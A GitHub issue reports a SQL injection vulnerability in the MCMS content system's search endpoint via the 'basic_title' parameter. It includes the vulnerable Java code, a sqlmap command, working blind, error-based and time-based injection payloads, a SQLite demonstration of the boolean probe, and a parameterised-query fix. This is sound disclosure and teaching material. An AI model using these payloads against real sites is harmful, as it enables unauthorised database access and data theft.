search has SQL injection vulnerability #27

Closed
x00er opened this issue Dec 26, 2019 · 1 comment
Comments

@x00er

x00er commented Dec 26, 2019

Where the SQL injection vulnerability appears in the code:

```java
@RequestMapping(value = "/{searchId}/search")
@ResponseBody
public void search(HttpServletRequest request, @PathVariable int searchId, HttpServletResponse response) {
    SearchEntity _search = new SearchEntity();
    _search.setAppId(BasicUtil.getAppId());
    _search.setSearchId(searchId);
    // Fetch the corresponding search model
    SearchEntity search = (SearchEntity) searchBiz.getEntity(_search);
    // Check whether the current search has a template file
    if (ObjectUtil.isNull(search)) {
        this.outJson(response, false);
        // no return here: execution continues past this check
    }
    Map<String, Object> map = new HashMap<>();
    // Read the request fields
    Map<String, String[]> field = request.getParameterMap();
    //TODO
    Map<String, String> basicField = getMapByProperties(net.mingsoft.mdiy.constant.Const.BASIC_FIELD);
    // Article field collection
    Map<String, Object> articleFieldName = new HashMap<String, Object>();
    // Custom (DIY) field collection
    Map<String, String> diyFieldName = new HashMap<String, String>();
```

The parameter 'basic_title' is not filtered and is user-controllable.

Payload
HTTP request URL: "http://localhost:8080/ms-mcms/cms/1/search.do"

Use sqlmap to test:

```
python sqlmap.py -u http://localhost:8080/ms-mcms/cms/1/search.do --data basic_title=q --level 3
```

The result is:

```
sqlmap identified the following injection point(s) with a total of 385 HTTP(s) requests:

Parameter: basic_title (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: basic_title=q') AND 3749=(SELECT (CASE WHEN (3749=3749) THEN 3749 ELSE (SELECT 7782 UNION SELECT 6107) END))-- ZskZ

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: basic_title=q') AND EXTRACTVALUE(9263,CONCAT(0x5c,0x716b627871,(SELECT (ELT(9263=9263,1))),0x71786b7a71)) AND ('nLqp'='nLqp

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (comment)
    Payload: basic_title=q') OR SLEEP(5)#
```

I ask the author to fix this vulnerability. Thanks.
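The mechanics behind the sqlmap finding above, as an added example that is not part of the original report or of the MCMS code base. The `q')` prefix in every payload indicates that the raw `basic_title` value is concatenated into a single-quoted, parenthesised predicate; that query shape, the `article` table with a `basic_title` column, and the three sample rows are all constructed assumptions for this demonstration and are run against an in-memory SQLite database rather than the MySQL backend the report targets (so the MySQL-only `EXTRACTVALUE` and `SLEEP` payloads are left out). The block reproduces sqlmap's recorded boolean-based blind probe against a string-concatenated query, shows why a true and a false condition give distinguishable results, and places a parameterised query beside it that treats the same payload as an ordinary search string.

```python
import sqlite3

# Constructed sample table (assumption, not the MCMS schema): a search target
# with a basic_title column. "faq" ends in "q" on purpose, so that the LIKE
# pattern truncated to '%q' by the injected ') still matches one row.
SAMPLE_TITLES = ["faq", "quarterly report", "unrelated article"]


def make_db():
    """Build an in-memory SQLite database holding the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE article (basic_title TEXT)")
    conn.executemany("INSERT INTO article VALUES (?)", [(t,) for t in SAMPLE_TITLES])
    return conn


def vulnerable_search(conn, basic_title):
    """String-concatenated query: the shape the sqlmap payload q') ... implies,
    i.e. the value lands inside a quoted, parenthesised predicate."""
    sql = ("SELECT basic_title FROM article "
           "WHERE (basic_title LIKE '%" + basic_title + "%')")
    return [row[0] for row in conn.execute(sql)]


def safe_search(conn, basic_title):
    """Bound parameter: the value never becomes part of the SQL text. The LIKE
    wildcards are escaped too, so a caller cannot widen the match with % or _."""
    escaped = (basic_title.replace("\\", "\\\\")
                          .replace("%", "\\%")
                          .replace("_", "\\_"))
    sql = "SELECT basic_title FROM article WHERE basic_title LIKE ? ESCAPE '\\'"
    return [row[0] for row in conn.execute(sql, ("%" + escaped + "%",))]


# sqlmap's boolean-based blind payload, copied from the report above.
TRUE_PROBE = ("q') AND 3749=(SELECT (CASE WHEN (3749=3749) THEN 3749 "
              "ELSE (SELECT 7782 UNION SELECT 6107) END))-- ZskZ")
# The same probe with its condition made false. A blind attacker compares the
# two responses and, by swapping in conditions such as SUBSTR((SELECT ...),n,1)='a',
# reads data out one character at a time.
FALSE_PROBE = TRUE_PROBE.replace("(3749=3749)", "(3749=3750)")


def demo():
    """Return the rows each query yields for the plain input and both probes."""
    conn = make_db()
    return {
        "vulnerable_plain": vulnerable_search(conn, "q"),
        "vulnerable_true": vulnerable_search(conn, TRUE_PROBE),
        "vulnerable_false": vulnerable_search(conn, FALSE_PROBE),
        "safe_plain": safe_search(conn, "q"),
        "safe_true": safe_search(conn, TRUE_PROBE),
        "safe_false": safe_search(conn, FALSE_PROBE),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name:17s} -> {rows}")
```

In the concatenated version the true probe returns the one title ending in "q" while the false probe returns nothing, which is exactly the response difference sqlmap keys on; the parameterised version returns nothing for either probe because the whole payload is compared as a literal. The same fix applies in Java: use a `PreparedStatement` with `?` placeholders, or in a MyBatis mapper `#{basic_title}` (a bound parameter) rather than `${basic_title}` (text substitution).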

@d1227731421
Contributor

Use MCMS version 5.1; the official release has fixed the problem.

@killfen killfen closed this as completed Sep 9, 2022